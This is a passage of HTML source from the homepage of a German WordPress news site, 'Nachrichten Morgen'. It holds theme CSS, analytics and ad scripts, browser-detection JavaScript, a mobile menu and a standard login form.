!important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
  80. .wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
  81. :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}
  82. :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}
  83. .wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
  84. </style>
  85. <link data-minify="1" rel='stylesheet' id='wordpress-gdpr-css' href='https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/wordpress-gdpr/public/css/wordpress-gdpr-public.css?ver=1712796473' type='text/css' media='all' />
  86. <link data-minify="1" rel='stylesheet' id='font-awesome-css' href='https://nachrichtenmorgen.de/wp-content/cache/min/1/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css?ver=1712796473' type='text/css' media='all' />
  87. <link data-minify="1" rel='stylesheet' id='td-plugin-multi-purpose-css' href='https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/td-multi-purpose/style.css?ver=1712796473' type='text/css' media='all' />
  88. <link data-minify="1" rel='stylesheet' id='google-fonts-style-css' href='https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/uploads/omgf/google-fonts-style/google-fonts-style.css?ver=1712796473' type='text/css' media='all' />
  89. <link data-minify="1" rel='stylesheet' id='tds-front-css' href='https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-subscription/assets/css/tds-front.css?ver=1712796473' type='text/css' media='all' />
  90. <link data-minify="1" rel='stylesheet' id='td-multipurpose-css' href='https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/assets/fonts/td-multipurpose/td-multipurpose.css?ver=1712796473' type='text/css' media='all' />
  91. <link data-minify="1" rel='stylesheet' id='td-theme-css' href='https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/themes/Newspaper/style.css?ver=1712796473' type='text/css' media='all' />
  92. <style id='td-theme-inline-css' type='text/css'>@media (max-width:767px){.td-header-desktop-wrap{display:none}}@media (min-width:767px){.td-header-mobile-wrap{display:none}}</style>
  93. <link data-minify="1" rel='stylesheet' id='td-legacy-framework-front-style-css' href='https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/assets/css/td_legacy_main.css?ver=1712796473' type='text/css' media='all' />
  94. <link data-minify="1" rel='stylesheet' id='tdb_style_cloud_templates_front-css' href='https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-cloud-library/assets/css/tdb_main.css?ver=1712796473' type='text/css' media='all' />
  95. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script>
  96. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script>
  97. <script type="text/javascript" id="cegg-price-alert-js-extra">
  98. /* <![CDATA[ */
  99. var ceggPriceAlert = {"ajaxurl":"https:\/\/nachrichtenmorgen.de\/wp-admin\/admin-ajax.php","nonce":"3e47da62bb"};
  100. /* ]]> */
  101. </script>
  102. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/content-egg/res/js/price_alert.js?ver=1712796473" id="cegg-price-alert-js"></script>
  103. <link rel="https://api.w.org/" href="https://nachrichtenmorgen.de/wp-json/" /><link rel="alternate" type="application/json" href="https://nachrichtenmorgen.de/wp-json/wp/v2/pages/270" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://nachrichtenmorgen.de/xmlrpc.php?rsd" />
  104. <link rel="alternate" type="application/json+oembed" href="https://nachrichtenmorgen.de/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnachrichtenmorgen.de%2F" />
  105. <link rel="alternate" type="text/xml+oembed" href="https://nachrichtenmorgen.de/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnachrichtenmorgen.de%2F&#038;format=xml" />
  106. <!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]-->
  107.        <script type="rocketlazyloadscript">
  108.        window.tdb_global_vars = {"wpRestUrl":"https:\/\/nachrichtenmorgen.de\/wp-json\/","permalinkStructure":"\/%postname%\/"};
  109.        window.tdb_p_autoload_vars = {"isAjax":false,"isAdminBarShowing":false,"autoloadScrollPercent":50};
  110.    </script>
  111.    
  112.    <style id="tdb-global-colors">:root{--accent-color:#fff}</style>
  113. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" id="google_gtagjs" data-rocket-src="https://www.googletagmanager.com/gtag/js?id=G-ETNN5CZVM6" async="async"></script>
  114. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" id="google_gtagjs-inline">
  115. /* <![CDATA[ */
  116. window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());gtag('config', 'G-ETNN5CZVM6', {'anonymize_ip': true} );
  117. /* ]]> */
  118. </script>
  119.  
  120. <!-- JS generated by theme -->
  121.  
  122. <script type="rocketlazyloadscript">
  123.    
  124.    
  125.  
  126.    var tdBlocksArray = []; //here we store all the items for the current page
  127.  
  128.    // td_block class - each ajax block uses a object of this class for requests
  129.    function tdBlock() {
  130.    this.id = '';
  131.    this.block_type = 1; //block type id (1-234 etc)
  132.    this.atts = '';
  133.    this.td_column_number = '';
  134.    this.td_current_page = 1; //
  135.    this.post_count = 0; //from wp
  136.    this.found_posts = 0; //from wp
  137.    this.max_num_pages = 0; //from wp
  138.    this.td_filter_value = ''; //current live filter value
  139.    this.is_ajax_running = false;
  140.    this.td_user_action = ''; // load more or infinite loader (used by the animation)
  141.    this.header_color = '';
  142.    this.ajax_pagination_infinite_stop = ''; //show load more at page x
  143.    }
  144.  
  145.        // td_js_generator - mini detector
  146.        ( function () {
  147.            var htmlTag = document.getElementsByTagName("html")[0];
  148.  
  149.        if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
  150.                htmlTag.className += ' ie10';
  151.            }
  152.  
  153.            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
  154.                htmlTag.className += ' ie11';
  155.            }
  156.  
  157.        if ( navigator.userAgent.indexOf("Edge") > -1 ) {
  158.                htmlTag.className += ' ieEdge';
  159.            }
  160.  
  161.            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
  162.                htmlTag.className += ' td-md-is-ios';
  163.            }
  164.  
  165.            var user_agent = navigator.userAgent.toLowerCase();
  166.            if ( user_agent.indexOf("android") > -1 ) {
  167.                htmlTag.className += ' td-md-is-android';
  168.            }
  169.  
  170.            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
  171.                htmlTag.className += ' td-md-is-os-x';
  172.            }
  173.  
  174.            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
  175.               htmlTag.className += ' td-md-is-chrome';
  176.            }
  177.  
  178.            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
  179.                htmlTag.className += ' td-md-is-firefox';
  180.            }
  181.  
  182.            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
  183.                htmlTag.className += ' td-md-is-safari';
  184.            }
  185.  
  186.            if( -1 !== navigator.userAgent.indexOf('IEMobile') ){
  187.                htmlTag.className += ' td-md-is-iemobile';
  188.            }
  189.  
  190.        })();
  191.  
  192.        var tdLocalCache = {};
  193.  
  194.        ( function () {
  195.            "use strict";
  196.  
  197.            tdLocalCache = {
  198.                data: {},
  199.                remove: function (resource_id) {
  200.                    delete tdLocalCache.data[resource_id];
  201.                },
  202.                exist: function (resource_id) {
  203.                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
  204.                },
  205.                get: function (resource_id) {
  206.                    return tdLocalCache.data[resource_id];
  207.                },
  208.                set: function (resource_id, cachedData) {
  209.                    tdLocalCache.remove(resource_id);
  210.                    tdLocalCache.data[resource_id] = cachedData;
  211.                }
  212.            };
  213.        })();
  214.  
  215.    
  216.    
  217. var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
  218. var td_animation_stack_effect="type0";
  219. var tds_animation_stack=true;
  220. var td_animation_stack_specific_selectors=".entry-thumb, img, .td-lazy-img";
  221. var td_animation_stack_general_selectors=".td-animation-stack img, .td-animation-stack .entry-thumb, .post img, .td-animation-stack .td-lazy-img";
  222. var tds_show_more_info="Show more info";
  223. var tds_show_less_info="Show less info";
  224. var tdc_is_installed="yes";
  225. var td_ajax_url="https:\/\/nachrichtenmorgen.de\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=12.6.2";
  226. var td_get_template_directory_uri="https:\/\/nachrichtenmorgen.de\/wp-content\/plugins\/td-composer\/legacy\/common";
  227. var tds_snap_menu="";
  228. var tds_logo_on_sticky="";
  229. var tds_header_style="";
  230. var td_please_wait="Bitte warten...";
  231. var td_email_user_pass_incorrect="Benutzername oder Passwort falsch!";
  232. var td_email_user_incorrect="E-Mail-Adresse oder Benutzername falsch!";
  233. var td_email_incorrect="E-Mail-Adresse nicht korrekt!";
  234. var td_user_incorrect="Benutzername falsch!";
  235. var td_email_user_empty="E-Mail oder Benutzername leer!";
  236. var td_pass_empty="Leer passieren!";
  237. var td_pass_pattern_incorrect="Ung\u00fcltiges Passmuster!";
  238. var td_retype_pass_incorrect="Retyped Pass incorrect!";
  239. var tds_more_articles_on_post_enable="";
  240. var tds_more_articles_on_post_time_to_wait="";
  241. var tds_more_articles_on_post_pages_distance_from_top=0;
  242. var tds_captcha="";
  243. var tds_theme_color_site_wide="#ec3535";
  244. var tds_smart_sidebar="";
  245. var tdThemeName="Newspaper";
  246. var tdThemeNameWl="Newspaper";
  247. var td_magnific_popup_translation_tPrev="Vorherige (Pfeiltaste links)";
  248. var td_magnific_popup_translation_tNext="Weiter (rechte Pfeiltaste)";
  249. var td_magnific_popup_translation_tCounter="%curr% von %total%";
  250. var td_magnific_popup_translation_ajax_tError="Der Inhalt von %url% konnte nicht geladen werden.";
  251. var td_magnific_popup_translation_image_tError="Das Bild #%curr% konnte nicht geladen werden.";
  252. var tdBlockNonce="ea97401edf";
  253. var tdMobileMenu="enabled";
  254. var tdMobileSearch="enabled";
  255. var tdDateNamesI18n={"month_names":["Januar","Februar","M\u00e4rz","April","Mai","Juni","Juli","August","September","Oktober","November","Dezember"],"month_names_short":["Jan","Feb","Mrz","Apr","Mai","Jun","Jul","Aug","Sep","Okt","Nov","Dez"],"day_names":["Sonntag","Montag","Dienstag","Mittwoch","Donnerstag","Freitag","Samstag"],"day_names_short":["So","Mo","Di","Mi","Do","Fr","Sa"]};
  256. var td_reset_pass_empty="Please enter a new password before proceeding.";
  257. var td_reset_pass_confirm_empty="Please confirm the new password before proceeding.";
  258. var td_reset_pass_not_matching="Please make sure that the passwords match.";
  259. var tdb_modal_confirm="Save";
  260. var tdb_modal_cancel="Cancel";
  261. var tdb_modal_confirm_alt="Yes";
  262. var tdb_modal_cancel_alt="No";
  263. var td_ad_background_click_link="";
  264. var td_ad_background_click_target="";
  265. </script>
  266.  
  267.  
  268. <!-- Header style compiled by theme -->
  269.  
  270. <style>.td-menu-background,.td-search-background{background-image:url('https://nachrichtenmorgen.de/wp-content/uploads/2023/11/43.webp')}.white-popup-block:before{background-image:url('https://nachrichtenmorgen.de/wp-content/uploads/2023/11/43.webp')}.td_cl .td-container{width:100%}@media (min-width:768px) and (max-width:1018px){.td_cl{padding:0 14px}}@media (max-width:767px){.td_cl .td-container{padding:0}}@media (min-width:1019px) and (max-width:1140px){.td_cl.stretch_row_content_no_space{padding-left:20px;padding-right:20px}}@media (min-width:1141px){.td_cl.stretch_row_content_no_space{padding-left:24px;padding-right:24px}}:root{--td_excl_label:'EXKLUSIV';--td_theme_color:#ec3535;--td_slider_text:rgba(236,53,53,0.7);--td_mobile_gradient_one_mob:rgba(0,0,0,0.8);--td_mobile_gradient_two_mob:rgba(0,0,0,0.8);--td_mobile_text_active_color:#ec3535;--td_login_hover_background:#ec3535;--td_login_hover_color:#ffffff;--td_login_gradient_one:rgba(0,0,0,0.65);--td_login_gradient_two:rgba(0,0,0,0.72)}</style>
  271.  
  272. <meta name="google-site-verification" content="RNZeSuV5iTfnybJsyWNrDwdisZstEDYaDQ0AoO0m0gA" />
  273. <script type="rocketlazyloadscript" async data-rocket-src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-4357542773862734"
  274.     crossorigin="anonymous"></script>
  275.  
  276. <!-- Google tag (gtag.js) -->
  277. <script type="rocketlazyloadscript" async data-rocket-src="https://www.googletagmanager.com/gtag/js?id=G-ETNN5CZVM6"></script>
  278. <script type="rocketlazyloadscript">
  279.  window.dataLayer = window.dataLayer || [];
  280.  function gtag(){dataLayer.push(arguments);}
  281.  gtag('js', new Date());
  282.  
  283.  gtag('config', 'G-ETNN5CZVM6');
  284. </script><link rel="icon" href="https://nachrichtenmorgen.de/wp-content/uploads/2023/05/cropped-CompressJPEG.online_512x512_image-1-32x32.png" sizes="32x32" />
  285. <link rel="icon" href="https://nachrichtenmorgen.de/wp-content/uploads/2023/05/cropped-CompressJPEG.online_512x512_image-1-192x192.png" sizes="192x192" />
  286. <link rel="apple-touch-icon" href="https://nachrichtenmorgen.de/wp-content/uploads/2023/05/cropped-CompressJPEG.online_512x512_image-1-180x180.png" />
  287. <meta name="msapplication-TileImage" content="https://nachrichtenmorgen.de/wp-content/uploads/2023/05/cropped-CompressJPEG.online_512x512_image-1-270x270.png" />
  288.  
  289. <!-- Button style compiled by theme -->
  290.  
  291. <style>.tdm-btn-style1{background-color:#ec3535}.tdm-btn-style2:before{border-color:#ec3535}.tdm-btn-style2{color:#ec3535}.tdm-btn-style3{-webkit-box-shadow:0 2px 16px #ec3535;-moz-box-shadow:0 2px 16px #ec3535;box-shadow:0 2px 16px #ec3535}.tdm-btn-style3:hover{-webkit-box-shadow:0 4px 26px #ec3535;-moz-box-shadow:0 4px 26px #ec3535;box-shadow:0 4px 26px #ec3535}</style>
  292.  
  293. <style id="tdw-css-placeholder"></style><noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player, [data-lazy-src]{display:none !important;}</style></noscript></head>
  294.  
  295. <body data-rsssl=1 class="home page-template-default page page-id-270 homepage global-block-template-1 tdb-template  tdc-header-template  tdc-footer-template td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="https://schema.org/WebPage">
  296.  
  297.            <div class="td-scroll-up  td-hide-scroll-up-on-mob" style="display:none;"><i class="td-icon-menu-up"></i></div>
  298.    
  299.    <div class="td-menu-background" style="visibility:hidden"></div>
  300. <div id="td-mobile-nav" style="visibility:hidden">
  301.    <div class="td-mobile-container">
  302.        <!-- mobile menu top section -->
  303.        <div class="td-menu-socials-wrap">
  304.            <!-- socials -->
  305.            <div class="td-menu-socials">
  306.                            </div>
  307.            <!-- close button -->
  308.            <div class="td-mobile-close">
  309.                <span><i class="td-icon-close-mobile"></i></span>
  310.            </div>
  311.        </div>
  312.  
  313.        <!-- login section -->
  314.                    <div class="td-menu-login-section">
  315.                
  316.    <div class="td-guest-wrap">
  317.        <div class="td-menu-login"><a id="login-link-mob">Anmelden</a></div>
  318.    </div>
  319.            </div>
  320.        
  321.        <!-- menu section -->
  322.        <div class="td-mobile-content">
  323.            <div class="menu-td-demo-header-menu-container"><ul id="menu-td-demo-header-menu-1" class="td-mobile-main-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first menu-item-935"><a href="https://nachrichtenmorgen.de/category/nachricht/">Nachricht</a></li>
  324. <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-936"><a href="https://nachrichtenmorgen.de/category/prominente/">Prominente</a></li>
  325. <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-937"><a href="https://nachrichtenmorgen.de/category/reisen/">Reisen</a></li>
  326. <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-938"><a href="https://nachrichtenmorgen.de/category/gesundheit/">Gesundheit</a></li>
  327. <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-939"><a href="https://nachrichtenmorgen.de/category/finanzen-und-vertrag/">Finanzen und Vertrag</a></li>
  328. <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-940"><a href="https://nachrichtenmorgen.de/category/essen/">Essen</a></li>
  329. <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-941"><a href="https://nachrichtenmorgen.de/category/marketing/">Marketing</a></li>
  330. </ul></div>        </div>
  331.    </div>
  332.  
  333.    <!-- register/login section -->
  334.            <div id="login-form-mobile" class="td-register-section">
  335.            
  336.            <div id="td-login-mob" class="td-login-animation td-login-hide-mob">
  337.             <!-- close button -->
  338.            <div class="td-login-close">
  339.                <span class="td-back-button"><i class="td-icon-read-down"></i></span>
  340.                <div class="td-login-title">Anmelden</div>
  341.                <!-- close button -->
  342.            <div class="td-mobile-close">
  343.                <span><i class="td-icon-close-mobile"></i></span>
  344.            </div>
  345.            </div>
  346.            <form class="td-login-form-wrap" action="#" method="post">
  347.                <div class="td-login-panel-title"><span>Herzlich willkommen!</span>Melde dich in deinem Konto an</div>
  348.                <div class="td_display_err"></div>
  349.                <div class="td-login-inputs"><input class="td-login-input" autocomplete="username" type="text" name="login_email" id="login_email-mob" value="" required><label for="login_email-mob">Ihr Benutzername</label></div>
  350.                <div class="td-login-inputs"><input class="td-login-input" autocomplete="current-password" type="password" name="login_pass" id="login_pass-mob" value="" required><label for="login_pass-mob">Ihr Passwort</label></div>
  351.                <input type="button" name="login_button" id="login_button-mob" class="td-login-button" value="Anmelden">
  352.                
  353.                <div class="td-login-info-text">
  354.                <a href="#" id="forgot-pass-link-mob">Passwort vergessen?</a>
  355.                </div>
  356.                <div class="td-login-register-link">
  357.                
  358.                </div>
  359.                
  360.                
  361.  
  362.                </form>
  363.            </div>
  364.  
  365.            
  366.            
  367.            
  368.            
  369.            <div id="td-forgot-pass-mob" class="td-login-animation td-login-hide-mob">
  370.                <!-- close button -->
  371.            <div class="td-forgot-pass-close">
  372.                <a href="#" aria-label="Back" class="td-back-button"><i class="td-icon-read-down"></i></a>
  373.                <div class="td-login-title">Passwort-Wiederherstellung</div>
  374.            </div>
  375.            <div class="td-login-form-wrap">
  376.                <div class="td-login-panel-title">Passwort zurücksetzen</div>
  377.                <div class="td_display_err"></div>
  378.                <div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email-mob" value="" required><label for="forgot_email-mob">Ihre E-Mail-Adresse</label></div>
  379.                <input type="button" name="forgot_button" id="forgot_button-mob" class="td-login-button" value="Senden Sie mein Passwort">
  380.                </div>
  381.            </div>
  382.        </div>
  383.    </div><div class="td-search-background" style="visibility:hidden"></div>
  384. <div class="td-search-wrap-mob" style="visibility:hidden">
  385. <div class="td-drop-down-search">
  386. <form method="get" class="td-search-form" action="https://nachrichtenmorgen.de/">
  387. <!-- close button -->
  388. <div class="td-search-close">
  389. <span><i class="td-icon-close-mobile"></i></span>
  390. </div>
  391. <div role="search" class="td-search-input">
  392. <span>Suche</span>
  393. <input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
  394. </div>
  395. </form>
  396. <div id="td-aj-search-mob" class="td-ajax-search-flex"></div>
  397. </div>
  398. </div>
  399.    <div id="td-outer-wrap" class="td-theme-wrap">
  400.  
  401.                    <div class="td-header-template-wrap" style="position: relative">
  402.                                <div class="td-header-mobile-wrap ">
  403.                    <div id="tdi_1" class="tdc-zone"><div class="tdc_zone tdi_2  wpb_row td-pb-row tdc-element-style"  >
  404. <style scoped>.tdi_2{min-height:0}.tdi_2>.td-element-style:after{content:''!important;width:100%!important;height:100%!important;position:absolute!important;top:0!important;left:0!important;z-index:0!important;display:block!important;background-color:#ffffff!important}.td-header-mobile-wrap{position:relative;width:100%}@media (max-width:767px){.tdi_2:before{content:'';display:block;width:100vw;height:100%;position:absolute;left:50%;transform:translateX(-50%);box-shadow:0px 2px 10px 0px rgba(0,0,0,0.09);z-index:20;pointer-events:none}@media (max-width:767px){.tdi_2:before{width:100%}}}</style>
  405. <div class="tdi_1_rand_style td-element-style" ></div><div id="tdi_3" class="tdc-row"><div class="vc_row tdi_4  wpb_row td-pb-row" >
  406. <style scoped>.tdi_4,.tdi_4 .tdc-columns{min-height:0}#tdi_3.tdc-row[class*='stretch_row']>.td-pb-row>.td-element-style,#tdi_3.tdc-row[class*='stretch_row']>.td-pb-row>.tdc-video-outer-wrapper{width:100%!important}.tdi_4,.tdi_4 .tdc-columns{display:block}.tdi_4 .tdc-columns{width:100%}@media (max-width:767px){.tdi_4,.tdi_4 .tdc-columns{display:flex}.tdi_4 .tdc-columns{width:100%}.tdi_4,.tdi_4 .tdc-columns{flex-direction:row;flex-wrap:nowrap;justify-content:flex-start;align-items:center}@media (min-width:768px){.tdi_4{margin-left:-0px;margin-right:-0px}.tdi_4 .tdc-row-video-background-error,.tdi_4>.vc_column,.tdi_4>.tdc-columns>.vc_column{padding-left:0px;padding-right:0px}}}</style><div class="vc_column tdi_6  wpb_column vc_column_container tdc-column td-pb-span4">
  407. <style scoped>.tdi_6{vertical-align:baseline}.tdi_6>.wpb_wrapper,.tdi_6>.wpb_wrapper>.tdc-elements{display:block}.tdi_6>.wpb_wrapper>.tdc-elements{width:100%}.tdi_6>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_6>.wpb_wrapper{width:auto;height:auto}@media (max-width:767px){.tdi_6{width:15%!important;display:inline-block!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap tdb_mobile_menu tdi_7 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_7" >
  408. <style>@media (max-width:767px){.tdi_7{margin-left:-12px!important}}</style>
  409. <style>.tdb-header-align{vertical-align:middle}.tdb_mobile_menu{margin-bottom:0;clear:none}.tdb_mobile_menu a{display:inline-block!important;position:relative;text-align:center;color:var(--td_theme_color,#4db2ec)}.tdb_mobile_menu a>span{display:flex;align-items:center;justify-content:center}.tdb_mobile_menu svg{height:auto}.tdb_mobile_menu svg,.tdb_mobile_menu svg *{fill:var(--td_theme_color,#4db2ec)}#tdc-live-iframe .tdb_mobile_menu a{pointer-events:none}.td-menu-mob-open-menu{overflow:hidden}.td-menu-mob-open-menu #td-outer-wrap{position:static}.tdi_7 .tdb-mobile-menu-button i{font-size:22px;width:55px;height:55px;line-height:55px}.tdi_7 .tdb-mobile-menu-button svg{width:22px}.tdi_7 .tdb-mobile-menu-button .tdb-mobile-menu-icon-svg{width:55px;height:55px}.tdi_7 .tdb-mobile-menu-button{color:#000000}.tdi_7 .tdb-mobile-menu-button svg,.tdi_7 .tdb-mobile-menu-button svg *{fill:#000000}.tdi_7 .tdb-mobile-menu-button:hover{color:#ec3535}.tdi_7 .tdb-mobile-menu-button:hover svg,.tdi_7 .tdb-mobile-menu-button:hover svg *{fill:#ec3535}@media (max-width:767px){.tdi_7 .tdb-mobile-menu-button i{font-size:26px}.tdi_7 .tdb-mobile-menu-button svg{width:26px}.tdi_7 .tdb-mobile-menu-button i{width:49.4px;height:49.4px;line-height:49.4px}.tdi_7 .tdb-mobile-menu-button .tdb-mobile-menu-icon-svg{width:49.4px;height:49.4px}}</style><div class="tdb-block-inner td-fix-index"><span class="tdb-mobile-menu-button"><i class="tdb-mobile-menu-icon td-icon-mobile"></i></span></div></div> <!-- ./block --></div></div><div class="vc_column tdi_9  wpb_column vc_column_container tdc-column td-pb-span4">
  410. <style scoped>.tdi_9{vertical-align:baseline}.tdi_9>.wpb_wrapper,.tdi_9>.wpb_wrapper>.tdc-elements{display:block}.tdi_9>.wpb_wrapper>.tdc-elements{width:100%}.tdi_9>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_9>.wpb_wrapper{width:auto;height:auto}@media (max-width:767px){.tdi_9{width:70%!important;display:inline-block!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap tdb_header_logo tdi_10 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_10" >
  411. <style>.tdi_10{z-index:0!important}@media (min-width:768px) and (max-width:1018px){.tdi_10{padding-top:10px!important;padding-bottom:10px!important}}@media (max-width:767px){.tdi_10{padding-top:6px!important;padding-bottom:10px!important;padding-left:10px!important}}</style>
  412. <style>.tdb_header_logo{margin-bottom:0;clear:none}.tdb_header_logo .tdb-logo-a,.tdb_header_logo h1{display:flex;pointer-events:auto;align-items:flex-start}.tdb_header_logo h1{margin:0;line-height:0}.tdb_header_logo .tdb-logo-img-wrap img{display:block}.tdb_header_logo .tdb-logo-svg-wrap+.tdb-logo-img-wrap{display:none}.tdb_header_logo .tdb-logo-svg-wrap svg{width:50px;display:block;transition:fill .3s ease}.tdb_header_logo .tdb-logo-text-wrap{display:flex}.tdb_header_logo .tdb-logo-text-title,.tdb_header_logo .tdb-logo-text-tagline{-webkit-transition:all 0.2s ease;transition:all 0.2s ease}.tdb_header_logo .tdb-logo-text-title{background-size:cover;background-position:center center;font-size:75px;font-family:serif;line-height:1.1;color:#222;white-space:nowrap}.tdb_header_logo .tdb-logo-text-tagline{margin-top:2px;font-size:12px;font-family:serif;letter-spacing:1.8px;line-height:1;color:#767676}.tdb_header_logo .tdb-logo-icon{position:relative;font-size:46px;color:#000}.tdb_header_logo .tdb-logo-icon-svg{line-height:0}.tdb_header_logo .tdb-logo-icon-svg svg{width:46px;height:auto}.tdb_header_logo .tdb-logo-icon-svg svg,.tdb_header_logo .tdb-logo-icon-svg svg *{fill:#000}.tdi_10 .tdb-logo-a,.tdi_10 h1{flex-direction:row;align-items:flex-start;justify-content:center}.tdi_10 .tdb-logo-svg-wrap{display:block}.tdi_10 .tdb-logo-img-wrap{display:none}.tdi_10 .tdb-logo-text-tagline{margin-top:0;margin-left:0px;color:#000000;font-family:Work Sans!important;font-size:12px!important;line-height:4.6!important;font-style:italic!important;font-weight:500!important;}.tdi_10 .tdb-logo-text-wrap{flex-direction:row;align-items:baseline;align-items:flex-start}.tdi_10 .tdb-logo-icon{top:0px;display:none}.tdi_10 .tdb-logo-text-title{color:#ec3535;font-family:PT Serif!important;font-size:100px!important;line-height:1.2!important;font-style:italic!important;font-weight:700!important;letter-spacing:-5px!important;}@media (max-width:767px){.tdb_header_logo .tdb-logo-text-title{font-size:36px}}@media (max-width:767px){.tdb_header_logo .tdb-logo-text-tagline{font-size:11px}}@media (min-width:1019px) and (max-width:1140px){.tdi_10 .tdb-logo-img{max-width:260px}.tdi_10 .tdb-logo-text-title{font-size:70px!important;letter-spacing:-3px!important;}.tdi_10 .tdb-logo-text-tagline{line-height:3.2!important;letter-spacing:0.5px!important;}}@media (min-width:768px) and (max-width:1018px){.tdi_10 .tdb-logo-img{max-width:180px}.tdi_10 .tdb-logo-icon{top:3px}.tdi_10 .tdb-logo-text-title{font-size:45px!important;letter-spacing:-2px!important;}.tdi_10 .tdb-logo-text-tagline{font-size:11px!important;line-height:2.5!important;letter-spacing:0px!important;}}@media (max-width:767px){.tdi_10 .tdb-logo-text-title{font-size:28px!important;font-style:normal!important;letter-spacing:-2px!important;}.tdi_10 .tdb-logo-text-tagline{font-size:10px!important;letter-spacing:0px!important;}}</style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://nachrichtenmorgen.de/"><h1><span class="tdb-logo-text-wrap"><span class="tdb-logo-text-title">Nachrichten Morgen</span><span class="tdb-logo-text-tagline"> </span></span></h1></a></div></div> <!-- ./block --></div></div><div class="vc_column tdi_12  wpb_column vc_column_container tdc-column td-pb-span4">
